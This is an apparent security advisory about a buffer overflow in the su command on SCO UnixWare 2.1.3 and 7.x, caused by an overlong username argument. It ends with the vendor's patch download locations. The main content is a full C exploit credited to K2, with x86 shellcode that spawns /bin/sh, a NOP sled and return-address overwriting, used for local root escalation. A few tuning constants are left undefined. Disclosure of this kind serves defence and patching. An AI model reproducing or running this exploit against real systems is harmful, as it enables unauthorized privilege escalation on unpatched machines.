COMMAND

    su

SYSTEMS AFFECTED

    UnixWare 2.1.3, UnixWare 7.0.0 through 7.1.1

PROBLEM

    Discovered by K2.  The su command on SCO's UnixWare 7 has improper
    bounds checking on  the username passed  (via argv[1]), which  can
    cause  a  buffer  overflow  when  a  lengthy  username  is passed.
    Exploit (by K2):

    // UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char shell[] =
     "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
     "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
     "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
     "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
     "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
     "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

    const char x86_nop=0x90;
    long nop,esp;
    long offset=DEFOFF;
    char buffer[SIZE];

    long get_esp() { __asm__("movl %esp,%eax"); }

    int main (int argc, char *argv[])
    {
        register int i;

        if (argc > 1) offset += strtol(argv[1], NULL, 0);
        if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        else
            nop = NOPDEF;
        esp = get_esp();

        memset(buffer, x86_nop, SIZE);
        memcpy(buffer+nop, shell, strlen(shell));

        for (i = nop+strlen(shell); i < SIZE-4; i += 4)
            *((int *) &buffer[i]) = esp+offset;

        printf("offset = [0x%x]\n",esp+offset);
        execl("/usr/bin/su", "su", buffer, NULL);

        printf("exec failed!\n");
        return 0;
    }

SOLUTION

    SCO is  providing an  interim patch  to address  this issue in the
    form  of  a  System  Security  Enhancement  (SSE) package.  SSE039
    contains  replacement  binaries  for  each  system  type,  and  is
    available for Internet  download via anonymous  ftp, and from  the
    SCOFORUM  on  Compuserve.   You  can  download  the SSE package as
    follows:

      Anonymous ftp (World Wide Web URL):
        ftp://ftp.sco.COM/SSE/sse039.ltr    (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse039.tar.Z  (new binaries, compressed tar file)

      Compuserve:
        GO SCOFORUM, and search  Library 11 (SLS/SSE Files)  for these
        filenames:

        SSE039.LTR      (cover letter, ASCII text)
        SSE039.TAZ      (new binaries, compressed tar file)